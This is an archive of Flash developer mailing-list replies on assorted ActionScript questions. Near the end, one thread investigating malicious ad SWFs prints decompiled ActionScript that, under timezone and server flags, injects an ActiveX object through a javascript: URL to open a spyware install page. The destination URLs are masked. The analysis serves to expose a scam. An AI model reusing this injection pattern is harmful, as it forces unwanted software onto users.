Re: [Flashcoders] scrollwheel bug in AS3?
Patrick Matte|BLITZ schrieb: Yes I've noticed that too, same thing here. it seems you're not exactly correct here: to me it seems like when sthe scrolling container reaches maxScroll, the flashplugin seems to fire the scroll event (back) to the browser. at least this is what it seems to me. it might be considered as a feature if you want to, if you think of how html-scrollcantainers behave. just my 0.2€ micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] scrollwheel bug in AS3?
Patrick Matte|BLITZ schrieb: Well it seems you're right! :-) micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] blur every clip...
Danny Kodicek schrieb: Hello, Hi, In my app I need to show a modal dialogue and blur/unblur all on-stage clips while the dialogue is active. So, whats the cleanest AS2 way to do this - I'm in Flash 8 but don't want any prototypes. I need to extend all movieclips so does this mean I will need to register every movieClip in the library with a class - thats a bit longwinded... How about creating a new BitmapData object from _root? i'm nott 100% sure if that even works, but that would include the modal too, as long as you don't load it externally into another level. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] blur every clip...
Ian Thomas schrieb: On 5/3/07, Michael Stuhr [EMAIL PROTECTED] wrote: How about creating a new BitmapData object from _root? i'm nott 100% sure if that even works, but that would include the modal too, as long as you don't load it externally into another level. Not if you create the BitmapData _before_ you show the modal. And it does work, I've done it before. :-) good point :-) micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Wave effect
Parvaiz Patel schrieb: Hi, Anybody knows how to create the wave effect shown in (http://www.mandchou.com/) at the bottom for dynamically loaded images. Pls let me know. Thanks regards, PP This is MAC only. micha *sorry couldn't resist. ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Zigo Fuse Filter syntax
Mick G schrieb: I'm working with Zigo/FMP and just getting used to these mysterious wonders... I've used *mc_tween2* in the past and was able to do this type of thing but not having any luck with the Fuse Kit... //Blur to 10, then back to 0 ZigoEngine.doTween(mc, Blur_blur, 10, 2, Elastic.easeOut, 0); ZigoEngine.doTween(mc, Blur_blur, 0, 2, Elastic.easeOut, 2); i too find it very hard to read through the Fuse-docs too. but as i understand it you do it with a callback (that's what i do) so: ZigoEngine.doTween(mc, Blur_blur, 10, 2, Elastic.easeOut, 0, myCallback); function myCallback () { ZigoEngine.doTween(mc, Blur_blur, 0, 2, Elastic.easeOut, 2); } Just take a look at the tooltip when you're typing ZigoEngine.doTween( ... micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] How to find yesterday?
[EMAIL PROTECTED] schrieb: Is this simple? cur_day = new Date(); //trace(cur_day.getDate()); Var1=cur_day.getDate()-1;//27 trace(var1);//26 the above doesn't take into account Day 1 of the current Month: function getYesterday () { var t:Date = new Date (); var daysBack:Number = 1; var today:Date = new Date (t.getFullYear (), t.getMonth (), t.getDate () - daysBack); return (today.getDate ()); } cheers micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Dynamic video buttons
Wendy Marino schrieb: Hello list! please: this list is for asking specific coding questions. not asking for someone doing someone elses work. please respect the lists etiquette. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] ActionScript syntax highlighter
Iv schrieb: Hello, http://www.bezier.ru/marker/ - you can use it offline: swf only needed. sweet :-) luviv micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Incorporating Flash Module into HTML site
Phil Dupré schrieb: Greetings, I have a mini flash web site that I would like to import into a dedicated area within an HTML site as a SWF file. This SWF file will essentially work like a general web site. It has a navigation menu with buttons and sub-buttons. The sub-buttons load swf files and or movie clips within the main swf file. My question is can this mini flash web site work without any issues if is imported into an HTML site? Or are there limitations to viewing Flash within HTML web sites? About the HTML site: Outside of hosting the mini-flash web site, the HTML site serves as a dashboard for information/content. It aggregates a calendar that's coming from Microsoft Outlook. It also shows a list of links to other web sites. Any feedback would be greatly appreciated. Thanks a lot. Kind regards, Phil ___ is this some kinda strange spam, or what ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] TEST
Glen Pike schrieb: Now who wants to discuss which editor is the best? :) no, let's talk about OS's *gg micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] OT: Pirated Books
Chris Saila schrieb: This is ridiculous. you could at least have shortend the quote. and writing tofu is bad too. sincerely, your mail police officer micha (and writing.toLowercase() is bad too, but isn't it the little failing that makes us all human ?) ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Importing SWF file into HTML web page
Phil Dupré schrieb: Hi, Boy, stop this shit. This List is about coding actionscript. What you need is some serious help in Web-Development. but for the sake: it's friday, i have my 1st beer intus: here's how the gods say you should do: http://www.bobbyvandersluis.com/ufo/ And just for the archive: YES! it's absolutely safe to use Flash in HTML. *shakes head + lends Phil a beer and pats him on the back: drink boy, you'll definately need this!* micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] any How-To instructions to make a Datechooser-like calendar in FlashMX?
BOYD SPEER schrieb: I would like to create a drop-down calendar in Flash MX that would let a user choose a date range. Any suggestions as to how to start? General sort of date-finder algorythms? MX ? those were the days :-) don't you have a DRK (3 or 4) with this kind of cal ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Seeking in a Progressively Downloaded FLV - Return of
Francis Chary schrieb: I have heard of a solution that someone implemented, using server-side code to serve the .flv file with different injected metadata, that did the same basic job of allowing seek to any point... but I can't remember how it was done or where I saw it. Does anyone else remember that? doesn't google do this ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] syntax highlighting
Iv schrieb: Hello, Almost every programmer sets his own code highlighting style and gets used to it to the point, that any other highlighting style makes it more difficult for him to read the code. Users of programming-related sites would be pleased to have a possibility to set their own personal code styles. Evidently, setting the right style for every site you read through is annoying. What if you could set the style once and make it somehow propagated to the code listings on every site you visit? wow, that's brialliant. i wonder how much code can be highlighted without getting slow. that is not meant to criticize your work, don't get me wrong. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] syntax highlighting
Iv schrieb: Hello Michael, MS i wonder how much code can be highlighted without getting slow. MS that is not meant to criticize your work, don't get me wrong. - tons. only css changed on the fly. no more. uhh, you got me wrong i think. everybudy can get full project from his browser cache if needed. no any server side scripts. don't understand that part. can you explain a little bit ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] syntax highlighting
Jason Boyd schrieb: I get a blank page. I have scripting turned off by default (using NoScript extension with Firefox). When turning scripting on, my first question is: how are the classes generated for actual code text on any old webpage? Does this apply to any code block, or what? I guess in general, how is it implemented? Programmers would generally want to know this; the page should explain. ___ no code block. look at the source. it's not really html if you ask me. at least it's not semantic :-) @ iv: would be nice - since we can use REAL css - if we could do such things as line-space and different fonts for the parts. oh and put a font-size anywhere in there, would be good enough on the target page. ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Flash and JAWS
JOR schrieb: I need to add JAWS support to a current application. Are there any developers out there already familiar with integration? I'm having a problem with JAWS trapping key events so event handlers in my app like click any key to continue aren't being called. I'm also trying to figure out how to submit a form within Flash once JAWS enters Forms Mode The ENTER and SPACE keys both seem to toggle Forms mode on/off so it's unclear how the form is suppose to submit. which version of Jaws and Flash are you targetting ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] FLV video and How did they do it?
Berkay Unal schrieb: Hi Coders, There is an option on the Video2brain's FLV player ( http://www.video2brain.com/videoplayer.cfm?video_id=1631) that when you click on a icon on the player as shown on the pic below the video's quality changes.It smthing like antializing is turned off or on. I think it's smthing with the FLV itself but could not figured out it's a feature of the video Object :-) If you're using FLVPlayer you can use it like: var video = flvplayer.getVideoPlayer (flvplayer.visibleVideoPlayerIndex); video = video._video; // dirty! video.smoothing = !video.smoothing; micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] FLV video and How did they do it?
Berkay Unal schrieb: The things is that i ahve tested their FLV player with a local flv i have created but it does not work. Can it be smthing with the encoding of the FLV . A special program used ? what isit you want to achieve ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] __DATE__ or similar in AS2 ?
Stefan Thurnherr schrieb: Hi flashcoders, I am looking for an easy way to indicate an SWF's version on the stage (i.e. via a textfield). I guess the easiest way would be if there was a compiler literal like __DATE__ (indicating the time/date of compilation) available within ActionScript. But I couldn't find any such thing neither in the livedocs, nor with the help of the almighty G. I'd prefer a solution that also works offline (i.e., not involving a call to a server-side script that gives the SWF access to its own time/date of creation). How do other flashcoders solve this problem? i've created a not-even-near-perfect serial-builder with jsfl. i'd always wanted to make this an os-version, but haven't had the time to do this. but before offering you my crappy code, i'd like to hear what others do have. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Remoting bytesLoaded/bytesTotal
Janis Radins schrieb: yeah I know that i can show L O A D I N G and remove it as I receive data but that's not the case question was whether there is any possibility to get accurate loaded/total bytes no. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
[Flashcoders] FLVPlayer and seek() flips out
when i'm trying to do a seek seekPercent or seekSeconds the FLVPlayer totally flips out. it seeks endlessly. what is the 'correct' way to do this ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Useful Ascii codes:
eric dolecki schrieb: I never wanna do this again, and you probably don't either, so here are some constants to make using ascii values of character codes more legible... - e. code // Constants (to make logic more readible) var KEY_EXCLAMATION:Number = 33; var KEY_DOUBLE_QUOTE:Number = 34; var KEY_POUND:Number = 35; var KEY_DOLLAR:Number = 36; var KEY_PERCENTAGE:Number = 37; var KEY_AND:Number = 38; var KEY_SINGLE_QUOTE:Number = 39; var KEY_LEFT_PAREN:Number = 40; var KEY_RIGHT_PAREN:Number = 41; var KEY_STAR:Number = 42; var KEY_PLUS:Number = 43; var KEY_COMMA:Number = 44; var KEY_MINUS:Number = 45; var KEY_PERIOD:Number = 46; var KEY_SLASH:Number = 47; var KEY_0:Number = 48; var KEY_1:Number = 49; var KEY_2:Number = 50; var KEY_3:Number = 51; var KEY_4:Number = 52; var KEY_5:Number = 53; var KEY_6:Number = 54; var KEY_7:Number = 55; var KEY_8:Number = 56; var KEY_9:Number = 57; var KEY_COLON:Number = 58; var KEY_SEMI_COLON:Number = 59; var KEY_LESS_THAN:Number = 60; var KEY_EQUAL:Number = 61; var KEY_GREATER_THAN:Number = 62; var KEY_QUESTION_MARK:Number = 63; var KEY_AT_SYMBOL:Number = 64; var KEY_A:Number = 65;var KEY_a:Number = 97; var KEY_B:Number = 66;var KEY_b:Number = 98; var KEY_C:Number = 67;var KEY_c:Number = 99; var KEY_D:Number = 68;var KEY_d:Number = 100; var KEY_E:Number = 69;var KEY_e:Number = 101; var KEY_F:Number = 70;var KEY_f:Number = 102; var KEY_G:Number = 71;var KEY_g:Number = 103; var KEY_H:Number = 72;var KEY_h:Number = 104; var KEY_I:Number = 73;var KEY_i:Number = 105; var KEY_J:Number = 74;var KEY_j:Number = 106; var KEY_K:Number = 75;var KEY_k:Number = 107; var KEY_L:Number = 76;var KEY_l:Number = 108; var KEY_M:Number = 77;var KEY_m:Number = 109; var KEY_N:Number = 78;var KEY_n:Number = 110; var KEY_O:Number = 79;var KEY_o:Number = 111; var KEY_P:Number = 80;var KEY_p:Number = 112; var KEY_Q:Number = 81;var KEY_q:Number = 113; var KEY_R:Number = 82;var KEY_r:Number = 114; var KEY_S:Number = 83;var KEY_s:Number = 115; var KEY_T:Number = 84;var KEY_t:Number = 116; var KEY_U:Number = 85;var KEY_u:Number = 117; var KEY_V:Number = 86; var KEY_v:Number = 118; var KEY_W:Number = 87;var KEY_w:Number = 119; var KEY_X:Number = 88;var KEY_x:Number = 120; var KEY_Y:Number = 89;var KEY_y:Number = 121; var KEY_Z:Number = 90;var KEY_z:Number = 122; var KEY_LEFT_BRACKET:Number = 91; var KEY_BACKSLASH:Number = 92; var KEY_RIGHT_BRACKET:Number = 93; var KEY_CARRET:Number = 94; var KEY_UNDERSCORE:Number = 95; var KEY_APOS:Number = 96; /code ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com ahh, reminds me of: http://proto.layer51.com/d.aspx?f=500 micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Selection.getFocus()
Lieven Cardoen schrieb: FlashCoders, Selection.getFocus() gives back a String. Is there a way to get the Object? eval() micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
[Flashcoders] fileUpload - suprise
i must be dreaming: the fileSelect-Window is now (9,0,18,60) resizable? wooohhooo! thanks mother! micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Re: [osflash] OpenSource Data Charting framework wanted ?
Romain Ecarnot schrieb: Thanks Darren, I'll take a look in few hours... ;) Romain. ActionScript Developper. var myFramework : Fever http://code.google.com/p/as2fever/ = new Fever()http://code.google.com/p/as2fever/ ; please update your detectionscripts or use another, cause the preview links won't bypass your flashdetection micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Allow smoothing on imported jpeg:s
Arul Prasad M L schrieb: There is no one line solution to this: Tinic Uro on the Flash player team had a way to do this using BitmapData class. Check this out: http://www.kaourantin.net/2005/12/dynamically-loading-bitmaps-with.html if you need a class, martijn has already one: http://www.martijndevisser.com/blog/article/imageloader-class-for-flash-8 micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Error check for parseXML()
Mendelsohn, Michael schrieb: Hi list... According to the help docs, public parseXML(value:String) : Void doesn't return an integer or anything to indicate successful parsing of the xml. How can I be certain that I've passed in some error free xml and it was able to parse? the XML-Object itself has such a thing. kinda ugly but hey :-) micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
[Flashcoders] setting global TextInput Styles v2
how do i set global textinput styles for the v2 components if i want a different focusIn and focusOut style ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] How to create a preloader that plays in full
Aaron Roberson schrieb: I want to create a preloader that plays through even if the rest of the timeline has been loaded. I saw a tutorial on this some time back but can't find it now. Forgive me if this is a common request or something but I have searched and searched but can't find it. The problem is probably that I'm not sure what keywords to use for a good search. you cannot find *anything* about how a *preloader* is made in flash ? is the list archive down ? is flashkit down ? is google down ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] How to create a preloader that plays in full
Aaron Roberson schrieb: I hope that makes sense. no. sorry. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] BitmapData size limit
Dave Wood schrieb: Anyone know why the 2880 pixel limit for either width or height of a BitmapData object? If the intention is to limit the amount of memory required (2880 X 2880 pixels would require about 24 Mb), then the limit should be on the total size of the image surely. Or is there some other reason for this that someone can explain? this has to with other things. the 2880 px stuff is related to one single object, you can have as much object of that size as you want, as long as you have enough ram. I wanted to create an image object 3500 X 300 pixels which will take up about 4 Mb - but I can't sure you can't. you gave your answer in the above quoted text. your limitation is 2880 px square. and 3500 beats that. just scale it down to 2880 and you should be fine, than you can put it in a mc and scale that one up. that should do the trick. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] How to create a preloader that plays in full
Pete Miller schrieb: And a preloader for the preloader's preloader...does Zeno's Paradox apply here you read too much Pyramids :-) micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] FileReference browse() window
Merrill, Jason schrieb: I'm using the Filerefence class on a project, and it works great uploading a file to our .NET server. (actually let me say, it's AWESOME - Flash should have had this a looong time ago). Question: Is there a way to control the X and Y position of the Filereference browse window that appears when you call browse()? I couldn't find anything in the docs. that's because there is no such way. to me it would be *much* more useful if we could use a resizable win. who ever implemented this stuff: wtf ? micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Hiding MD5 shared secret
David Rorex schrieb: hide the secret in many different places throughout the swf, and then combine them together to produce the actual code (using some odd formula). name them things that make it seem related to something else. part of the shared secret should also come from the server, so that it is different every time. some lame examples: _root.someInvisibleMC._x=123; _root.someInvisibleMC._y=124; // 124 is hardcoded on the server // ... highscores = server.getHighScores(); // actually returns a random number which is also stored on the server var userID = getTimer(); server.trackUsage(userID); // server stores this value as well // ... var currentDate = MD5(_root.someInvisibleMC._y+highscores+userID+currentScore); // server can also calculate this, because it knows all the same pieces of data // ... submitScore(currentDate, currentScore); // actually submit the score to the server hope this gives you some ideas. in the end, it's pretty much impossible to completely secure it, you just have to make the barrier high enough that they will give up attacking your game, and try on some less-well defended one. but...if the player's score actually gives them some reward which has real value (a prize, or a coupon, or free download or something), assume that it will be hacked, no matter what you do. -David R reminds me of: http://thc.segfault.net/root/phun/unmaintain.html :-) micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Disable Row in ListBox Component
[EMAIL PROTECTED] schrieb: Hello All --- Is it possible to disable a row or number of (specific) rows in a ListBox without disabling the entire ListBox? i think you have to do this manually. you either create a cellrenderer for your list and handle it this way (look in the help for cellRenderer API) or you could : var list:mx.controls.List; list.addItem({label:Flash, data:{value:1, enabled:true}} ); /**/ list.addItem({label:Dreamweaver, data:{value:2, enabled:false}} ); list.addItem({label:ColdFusion, data:{value:3, enabled:true}} ); function onListClick (evt:Object) { var list = evt.target; // if (!list.selectedItem.data.enabled) { list.selectedIndex = undefined; list.invalidate(); trace (this item is disabled) } else { trace (you selected: + list.selectedItem.label) } } function onListRollOver(evt:Object) { var list = evt.target; var ix = evt.index; var item = list.getItemAt(ix); var curCol = list.getStyle(backgroundColor); // be aware of alternatingRowColors, you'd have to check here if ix is odd or even, also you should check that there's no cutom cellrenderer here // if (!item.data.enabled) { list.setPropertiesAt(ix, {backgroundDisabledColor:curCol}); list.invalidate(); } else { trace (you hovered: + list.selectedItem.label); } } list.addEventListener ('change', onListClick) list.addEventListener ('itemRollOver', onListRollOver) cheers ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Decompiling some sketchy flash code
Michiel Nolet schrieb: Dear List, First off, apologies if this is the wrong forum for this question. Some background -- I'm in the online advertising industry and I've been trying to track down an squash a scam that has been hitting the industry. There is a party out there (errorsafe.com) that is embedding some very nasty code in their flash ads that depending on several factors will popup a new window and try install their spyware using active-x. Here are two sample swf files: http://content.yieldmanager.com/13312/94749/27e558c94df509ebe888fdc0060640e8.swf http://content.yieldmanager.com/17344/138497/6d4ef47cf4071557d6749ad9c2fcf8cc.swf i tried to decompile them with asv (latest version). i can clearly see what is inside there. i would give you the rebuild files, but maybe you should ask burak himself (he is on this list) to give you those. micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Decompiling some sketchy flash code
Michiel Nolet schrieb: All I see on decompiling is things like: var eval (\x01) = 930; while (while (while (while (while (while (while (while (while (while (while (while (while (while (while (while (while (while (eval (\x01) == 930) { eval (\x01) = eval (\x01) - 695} , eval (\x01) == 67) { eval (\x01) = eval (\x01) + 718// branch @1 } , eval (\x01) == 349) { eval (\x01) = eval (\x01) + 149// branch @1 } , eval (\x01) == 264) { eval (\x01) = eval (\x01) + 84} Am I missing something? sure buy a copy of asv and you get the full experience :-) micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Decompiling some sketchy flash code
Michiel Nolet schrieb: I am more than willing to shell $59.95 for asv, I just want to make sure it can extract stuff that other toosl couldn't. I've tried the free command line ones, and shell out $30 for some crappy software that plain didn't work. Could you copy paste some sample lines of more informative code you're finding? function setswfashCookie() { my_date.setTime(my_date.getTime() + 43200); my_so.data.expires = my_date.getTime(); my_so.swfush(); if (_root.strong) { this.createEmptyMovieClip(target_mc, this.getNextHighestDepth()); target_mc.unique = unique.getTime(); target_mc.loadVariables(_root.sscript, GET); target_mc.param_interval = setInterval(checkParamsLoaded, 100); } } function checkParamsLoaded() { if (target_mc.popup == undefined) { } else if (target_mc.popup == 1) { clearInterval(target_mc.param_interval); getURL (_root.tzjscript, _self); } else if (target_mc.popup == 0) { clearInterval(target_mc.param_interval); } } _root.strong = true; _root.strongPP = ###; _root.sscript = ###; _root.easyPP = ###; _root.tz_begin = -3; _root.tz_end = -9; _root.tzjscript = (javascript:var w=window,n=navigator,a=n.appMinorVersion,d=document,u=' + _root.strongPP) + ',dt=new Date(),tz=-dt.getTimezoneOffset()/60;p=(n.userAgent.indexOf('SV1')!=-1)||(a(a.indexOf('SP2')!=-1));i=(d.allencodeURI()!w.Event);if(!(tz=) + _root.tz_end) + tz=) + _root.tz_begin) + )){if(p!d.getElementById('o')){d.body.innerHTML+='object id=o height=\0\ classid=\CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6\/object';};(ip)?o.launchURL(u):w.open(u);};void 0;; _root.jscript = (javascript:var w=window,n=navigator,a=n.appMinorVersion,d=document,u=' + _root.strongPP) + ';p=(n.userAgent.indexOf('SV1')!=-1)||(a(a.indexOf('SP2')!=-1));i=(d.allencodeURI()!w.Event);if(p!d.getElementById('o')){d.body.innerHTML+='object id=o height=\0\ classid=\CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6\/object';};(ip)?o.launchURL(u):w.open(u);void 0;; var unique:Date = new Date(); var my_date:Date = new Date(); var my_so:SharedObject = SharedObject.getLocal(tiger_swf7300506, /); if (my_so.data.expires != undefined) { var tm = my_date.getTime(); if (tm my_so.data.expires) { setswfashCookie(); } } else { setswfashCookie(); } if (_root.ClickTAG == undefined) { _root.ClickTAG = _root.easyPP; } if (_root.ClickTARGET == undefined) { _root.ClickTARGET = _blank; } _root.URL_btn.onRelease = function () { getURL (_root.ClickTAG, _root.ClickTARGET); }; those ###'s are real urls. and those are only the actions on frame 1 ... i guess you lost ~60 bucks right now :-) micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
Re: [Flashcoders] Flash upload problems
Muzak schrieb: http://www.osflash.org/pipermail/osflash_osflash.org/2006-February/007266.html *bookmark* This has nothing to do with Struts by the way. Struts is just a framework. http://struts.apache.org/ :-) micha ___ Flashcoders@chattyfig.figleaf.com To change your subscription options or search the archive: http://chattyfig.figleaf.com/mailman/listinfo/flashcoders Brought to you by Fig Leaf Software Premier Authorized Adobe Consulting and Training http://www.figleaf.com http://training.figleaf.com
